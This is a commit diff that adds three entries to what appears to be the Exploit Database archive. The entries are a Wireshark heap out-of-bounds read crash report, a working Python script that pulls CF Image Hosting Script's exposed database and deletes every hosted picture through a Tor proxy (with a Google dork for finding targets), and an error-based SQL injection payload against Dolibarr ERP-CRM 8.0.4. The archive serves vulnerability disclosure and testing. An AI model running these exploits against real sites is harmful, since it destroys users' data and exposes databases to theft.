DB: 2019-01-09

3 changes to exploits/shellcodes Wireshark - 'get_t61_string' Heap Out-of-Bounds Read CF Image Hosting Script 1.6.5 - (Delete all Pictures) Privilege Escalation Dolibarr ERP-CRM 8.0.4 - 'rowid' SQL Injection
2019-01-09 05:01:54 +00:00 · 2019-01-09 05:01:54 +00:00 · 0b8f4f786a
commit 0b8f4f786a
parent deaee53895
4 changed files with 224 additions and 0 deletions
--- a/exploits/multiple/dos/46096.txt
+++ b/exploits/multiple/dos/46096.txt
@ -0,0 +1,109 @@
+The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of Wireshark, by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file").
+
+--- cut ---
+=================================================================
+==16936==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000a74da at pc 0x7fb5355e214a bp 0x7ffd922f8f00 sp 0x7ffd922f8ef8
+READ of size 1 at 0x6020000a74da thread T0
+    #0 0x7fb5355e2149 in get_t61_string wireshark/epan/charsets.c:1379:19
+    #1 0x7fb5353367ab in dissect_rtse_T_t61String wireshark/./asn1/rtse/rtse.cnf:122:58
+    #2 0x7fb533688315 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2941:21
+    #3 0x7fb535336534 in dissect_rtse_CallingSSuserReference wireshark/./asn1/rtse/rtse.cnf:163:12
+    #4 0x7fb53368462c in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2425:17
+    #5 0x7fb535336267 in dissect_rtse_SessionConnectionIdentifier wireshark/./asn1/rtse/rtse.cnf:111:14
+    #6 0x7fb533688315 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2941:21
+    #7 0x7fb535335f54 in dissect_rtse_ConnectionData wireshark/./asn1/rtse/rtse.cnf:135:12
+    #8 0x7fb533686770 in dissect_ber_set wireshark/epan/dissectors/packet-ber.c:2691:25
+    #9 0x7fb535334e11 in dissect_rtse_RTORQapdu wireshark/./asn1/rtse/rtse.cnf:46:14
+    #10 0x7fb533686770 in dissect_ber_set wireshark/epan/dissectors/packet-ber.c:2691:25
+    #11 0x7fb535153f08 in dissect_ppdu wireshark/./asn1/pres/pres.cnf
+    #12 0x7fb535153f08 in dissect_pres wireshark/./asn1/pres/packet-pres-template.c:327
+    #13 0x7fb535640be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
+    #14 0x7fb535640be0 in call_dissector_work wireshark/epan/packet.c:791
+    #15 0x7fb53563ccb8 in call_dissector_only wireshark/epan/packet.c:3141:8
+    #16 0x7fb53563ccb8 in call_dissector_with_data wireshark/epan/packet.c:3154
+    #17 0x7fb5345f85be in call_pres_dissector wireshark/epan/dissectors/packet-ses.c:349:3
+    #18 0x7fb5345f85be in dissect_parameter wireshark/epan/dissectors/packet-ses.c:662
+    #19 0x7fb5345f7352 in dissect_parameters wireshark/epan/dissectors/packet-ses.c:862:10
+    #20 0x7fb5345f7352 in dissect_spdu wireshark/epan/dissectors/packet-ses.c:972
+    #21 0x7fb5345f61d5 in dissect_ses wireshark/epan/dissectors/packet-ses.c:1068:12
+    #22 0x7fb5345f65b4 in dissect_ses_heur wireshark/epan/dissectors/packet-ses.c:1136:2
+    #23 0x7fb535647a43 in dissector_try_heuristic wireshark/epan/packet.c:2750:9
+    #24 0x7fb53434b3ed in ositp_decode_DT wireshark/epan/dissectors/packet-ositp.c:1150:9
+    #25 0x7fb53434b3ed in dissect_ositp_internal wireshark/epan/dissectors/packet-ositp.c:2111
+    #26 0x7fb535640be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
+    #27 0x7fb535640be0 in call_dissector_work wireshark/epan/packet.c:791
+    #28 0x7fb53563ccb8 in call_dissector_only wireshark/epan/packet.c:3141:8
+    #29 0x7fb53563ccb8 in call_dissector_with_data wireshark/epan/packet.c:3154
+    #30 0x7fb53388cd21 in dissect_clnp wireshark/epan/dissectors/packet-clnp.c:237:9
+    #31 0x7fb535640be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
+    #32 0x7fb535640be0 in call_dissector_work wireshark/epan/packet.c:791
+    #33 0x7fb535641289 in dissector_try_uint_new wireshark/epan/packet.c:1383:8
+    #34 0x7fb535641289 in dissector_try_uint wireshark/epan/packet.c:1407
+    #35 0x7fb534347d07 in dissect_osi wireshark/epan/dissectors/packet-osi.c:451:7
+    #36 0x7fb535640be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
+    #37 0x7fb535640be0 in call_dissector_work wireshark/epan/packet.c:791
+    #38 0x7fb535641289 in dissector_try_uint_new wireshark/epan/packet.c:1383:8
+    #39 0x7fb535641289 in dissector_try_uint wireshark/epan/packet.c:1407
+    #40 0x7fb5343f2637 in dissect_ppp_common wireshark/epan/dissectors/packet-ppp.c:4788:10
+    #41 0x7fb5343df7a4 in dissect_ppp_hdlc wireshark/epan/dissectors/packet-ppp.c:5848:5
+    #42 0x7fb535640be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
+    #43 0x7fb535640be0 in call_dissector_work wireshark/epan/packet.c:791
+    #44 0x7fb535640610 in dissector_try_uint_new wireshark/epan/packet.c:1383:8
+    #45 0x7fb533bc1a28 in dissect_frame wireshark/epan/dissectors/packet-frame.c:579:11
+    #46 0x7fb535640be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
+    #47 0x7fb535640be0 in call_dissector_work wireshark/epan/packet.c:791
+    #48 0x7fb53563ccb8 in call_dissector_only wireshark/epan/packet.c:3141:8
+    #49 0x7fb53563ccb8 in call_dissector_with_data wireshark/epan/packet.c:3154
+    #50 0x7fb53563c1ee in dissect_record wireshark/epan/packet.c:580:3
+    #51 0x7fb53561f068 in epan_dissect_run_with_taps wireshark/epan/epan.c:547:2
+    #52 0x55e97abc7917 in process_packet_single_pass wireshark/tshark.c:3572:5
+    #53 0x55e97abc2d12 in process_cap_file wireshark/tshark.c:3403:11
+    #54 0x55e97abc2d12 in real_main wireshark/tshark.c:2046
+    #55 0x7fb5291612b0 in __libc_start_main
+    #56 0x55e97aac4a49 in _start
+
+0x6020000a74da is located 0 bytes to the right of 10-byte region [0x6020000a74d0,0x6020000a74da)
+allocated by thread T0 here:
+    #0 0x55e97ab7a0c0 in malloc
+    #1 0x7fb529d71588 in g_malloc
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow wireshark/epan/charsets.c:1379:19 in get_t61_string
+Shadow bytes around the buggy address:
+  0x0c048000ce40: fa fa 00 01 fa fa 07 fa fa fa 05 fa fa fa 00 00
+  0x0c048000ce50: fa fa 00 fa fa fa 00 00 fa fa fd fa fa fa fd fa
+  0x0c048000ce60: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
+  0x0c048000ce70: fa fa fd fa fa fa fd fa fa fa 00 00 fa fa 00 05
+  0x0c048000ce80: fa fa 00 05 fa fa 00 00 fa fa fd fa fa fa 00 00
+=>0x0c048000ce90: fa fa fd fa fa fa fd fa fa fa 00[02]fa fa fa fa
+  0x0c048000cea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c048000ceb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c048000cec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c048000ced0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c048000cee0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==16936==ABORTING
+--- cut ---
+
+The bug was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=15373. Attached are three files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46096.zip
--- a/exploits/php/webapps/46094.py
+++ b/exploits/php/webapps/46094.py
@ -0,0 +1,82 @@
+#!/usr/bin/env python
+"""
+Exploit Title: CF Image Hosting Script 1.6.5: Delete database
+Google Dork: "Powered By CF Image Hosting script"
+Date: 01/08/2019
+Exploit Author: David Tavarez
+Vendor Homepage: https://davidtavarez.github.io/
+Software Link: http://forum.codefuture.co.uk/showthread.php?tid=73141
+Version: 1.6.5
+Tested on: Debian 9.6
+
+By default, the database can be downloaded by any user. After decoding
+the file the database should be unserialize. The DELETE ID is stored
+in Plain Text, this ID can be use to delete a picture.
+
+$ virtualenv cfexploit
+$ source cfexploit/bin/activate
+$ pip install phpserialize
+$ pip install PySocks
+$ python exploit.py http://127.0.0.1:8000
+
+[-] Target: http://127.0.0.1:8000/
+[-] Downloading the database...
+[+] Decoding database...
+[-] Finding pictues...
+[+] Pictures found: 3
+[+] Ready... let's do this! Deleting all pictures...
+[+] Done.
+
+"""
+import phpserialize
+import base64
+
+import socks
+import socket
+
+import sys
+
+
+def create_connection(address, timeout=None, source_address=None):
+    sock = socks.socksocket()
+    sock.connect(address)
+    return sock
+
+
+socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9150)
+
+# patch the socket module
+socket.socket = socks.socksocket
+socket.create_connection = create_connection
+
+import urllib2
+
+if __name__ == '__main__':
+    if len(sys.argv) == 1:
+        print "ERROR: Provide a valid URL"
+        sys.exit(-1)
+    url = sys.argv[1]
+
+    ids = []
+
+    try:
+        print "[+] Target: {}".format(url)
+        print "[+] Downloading the database..."
+        response = urllib2.urlopen("{}/upload/data/imgdb.db".format(url))
+        print "[+] Decoding database..."
+        with open("imgdb.db.txt", "w+") as f:
+            f.write(base64.b64decode(response.read()))
+        print "[+] Finding pictues..."
+        for key, value in phpserialize.load(file("imgdb.db.txt")).iteritems():
+            ids.append(value.get('deleteid'))
+        print "[+] Pictures found: {}".format(len(ids))
+        print "[+] Ready... let's do this! Deleting all pictures..."
+        for id in ids:
+            urllib2.urlopen("{}/?d={}".format(url, id))
+        print "[+] Done."
+
+    except urllib2.URLError, ex:
+        if ex.reason == "Forbidden":
+            print "[-] ERROR: this version is not vulnerable."
+    except EOFError, e:
+        raise e
--- a/exploits/php/webapps/46095.txt
+++ b/exploits/php/webapps/46095.txt
@ -0,0 +1,30 @@
+# Title: Dolibarr ERP-CRM 8.0.4 - 'rowid' SQL Injection
+# Date: 08.01.2019
+# Exploit Author: Mehmet Önder Key
+# Vendor Homepage: https://www.dolibarr.org/
+# Software Link: https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/8.0.4/dolibarr-8.0.4.zip
+# Version: v8.0.4
+# Category: Webapps
+# Tested on: WAMPP @Win
+# Software description:
+Dolibarr ERP - CRM is an easy to use ERP and CRM open source software
+package (run with a web php server or as standalone software) for
+businesses, foundations or freelancers (prospect, invoicing, inventory,
+warehouse, order, shipment, POS, members for foundations, bank accounts...)
+
+# Vulnerabilities:
+# An attacker can access all data following an un/authorized user login
+using the parameter.
+
+
+# POC - SQLi :
+
+# Parameter: rowid (POST)
+# Request URL: http://localhost/doli/htdocs/admin/dict.php?id=16
+
+#    Type : Error Based
+actionmodify=Modify&button_removefilter=Remove
+filter&button_search=Search&code=PL_NONE&entity=&from=&libelle=None&page=0&position=1&rowid=\%'
+AND EXTRACTVALUE(6385,CONCAT(0x5c,0x716b717871,(SELECT
+(ELT(6385=6385,1))),0x7176787171)) AND
+'%'='&search_code=94102&token=$2y$10$KhKjYSBlkY24Xl8v.d0ZruN98LAFOAZ5a5dzi4Lxe3g21Gx46deHK
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6238,6 +6238,7 @@ id,file,description,date,author,type,platform,port
 46087,exploits/windows/dos/46087.py,"BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC)",2019-01-07,"Luis Martínez",dos,windows,
 46088,exploits/windows/dos/46088.py,"SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC)",2019-01-07,"Luis Martínez",dos,windows,
 46089,exploits/windows/dos/46089.py,"Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)",2019-01-07,"Luis Martínez",dos,windows,
+46096,exploits/multiple/dos/46096.txt,"Wireshark - 'get_t61_string' Heap Out-of-Bounds Read",2019-01-08,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -40577,3 +40578,5 @@ id,file,description,date,author,type,platform,port
 46090,exploits/windows/webapps/46090.html,"Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery",2019-01-07,LiquidWorm,webapps,windows,80
 46091,exploits/windows/webapps/46091.html,"Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection",2019-01-07,LiquidWorm,webapps,windows,
 46092,exploits/hardware/webapps/46092.py,"Huawei E5330 21.210.09.00.158 - Cross-Site Request Forgery (Send SMS)",2019-01-07,"Nathu Nandwani",webapps,hardware,
+46094,exploits/php/webapps/46094.py,"CF Image Hosting Script 1.6.5 - (Delete all Pictures) Privilege Escalation",2019-01-08,"David Tavarez",webapps,php,80
+46095,exploits/php/webapps/46095.txt,"Dolibarr ERP-CRM 8.0.4 - 'rowid' SQL Injection",2019-01-08,"Mehmet Onder",webapps,php,80